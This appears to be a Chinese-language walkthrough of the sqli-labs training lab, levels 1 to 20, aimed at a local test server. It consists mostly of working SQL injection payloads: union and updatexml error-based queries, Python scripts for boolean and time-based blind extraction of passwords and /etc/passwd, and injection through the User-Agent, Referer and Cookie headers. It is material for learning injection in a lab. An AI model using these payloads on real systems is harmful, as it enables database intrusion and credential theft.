?id=1' order by 3;--+ # 爆字段数
?id=-1' union select 1,2,database();--+ # 爆库名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security';--+ # 爆表名
?id=-1' union select 1,2,group_concat(column_name) FROM information_schema.columns where table_schema='security' and table_name='users';--+ # 爆字段
?id=-1' union select 1,2,group_concat(username, " ", password) from users --+ #爆字段内容
?id=-1' or updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ # 爆库名
?id=-1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+ # 爆表名
?id=-1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+ # 爆字段名
?id=-1' or updatexml(1,concat(0x7e,(select group_concat(username, " ", password) from users),0x7e),1)--+ # 爆字段内容
import requests
if __name__ == "__main__":
for i in range(1, 256):
left = 32
right = 127
mid = (left + right) // 2
while left < right:
url = f"http://127.0.0.1:8080/Less-7/?id=1'))and ascii(substring((select load_file('/etc/passwd')),{i},{i}))>{mid} --+"
response = requests.get(url)
if response.text.find("You are in") == -1:
right = mid
else:
left = mid + 1
mid = (left + right) // 2
print(chr(mid), end="")
接着读取user表。
import requests
if __name__ == "__main__":
for i in range(1, 256):
left = 32
right = 127
mid = (left + right) // 2
while left < right:
url = f"http://127.0.0.1:8080/Less-7/?id=1'))and ascii(substring((select group_concat(password) from users),{i},{i}))>{mid} --+"
response = requests.get(url)
if response.text.find("You are in") == -1:
right = mid
else:
left = mid + 1
mid = (left + right) // 2
print(chr(mid), end="")
import requests
if __name__ == "__main__":
for i in range(1, 256):
left = 32
right = 127
mid = (left + right) // 2
while left < right:
url = f"http://127.0.0.1:8080/Less-8/?id=1' and ascii(substring((select group_concat(password) from users),{i},{i}))>{mid} --+"
response = requests.get(url)
if response.text.find("You are in") == -1:
right = mid
else:
left = mid + 1
mid = (left + right) // 2
print(chr(mid), end="")
Less-9 -> Less-10
时间盲注
iimport requests
import time
if __name__ == '__main__':
for i in range(1, 256):
left = 32
right = 127
mid = (left + right) // 2
while left < right:
payload = "select group_concat(password) from users"
url = f"http://127.0.0.1:8080/Less-9/?id=1' and if(ascii(substring(({payload}),{i},{i}))>{mid},sleep(3),1)--+"
start = time.time()
response = requests.get(url, timeout=5)
end = time.time()
if end - start < 3:
right = mid
else:
left = mid + 1
mid = (left + right) // 2
print(chr(mid))
Less-10
把单引号改成双引号即可。
Less-11 -> Less-14
这关终于有个登录功能了,万能钥匙直接登录。
报错注入数据外带
跟Less-5一样的payload。
Less-12用")闭合。
Less-13用')闭合。
Less-14用"闭合。
Less-15 -> Less-16
报错爆不出来了,只能尝试盲注了。
看了一下源码,原来是不打印报错信息了。
看一下源码
直接单引号闭合盲注完事
import requests
import time
if __name__ == '__main__':
for i in range(1, 256):
left = 32
right = 127
mid = (left + right) // 2
while left < right:
url = f"http://127.0.0.1:8080/Less-16/"
data = {
"uname": f"admin' or if(ascii(substring((select group_concat(password) from users),{i},1))>{mid},sleep(1),1);#",
"passwd": "1' or 1=1;#"
}
try:
start = time.time()
response = requests.request("POST", url=url, data=data)
end = time.time()
if end - start < 3:
right = mid
else:
left = mid + 1
mid = (left + right) // 2
except:
left = mid + 1
print(chr(mid))
Less-16
改成")完事。
这里脚本写的有点问题,延时的特别久直到timeout,也不懂是啥问题,最后只能用try捕捉了。
Less-17
密码更新功能,是update注入。
源码中打印error信息,报错注入一把梭。
uname=admin&passwd=123456' or updatexml(1,concat(0x7e,database(), 0x7e),1);#
Less-18
User-Agent注入,继续报错注入
username: Dumb
password: Dumb
User-Agent: admin' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1
Less-19
Referer注入,和上一题差不多。
username: Dumb
password: Dumb
Referer: admin' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1
Less-20
Cookie注入
登录后修改Cookie
' and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) and '1'='1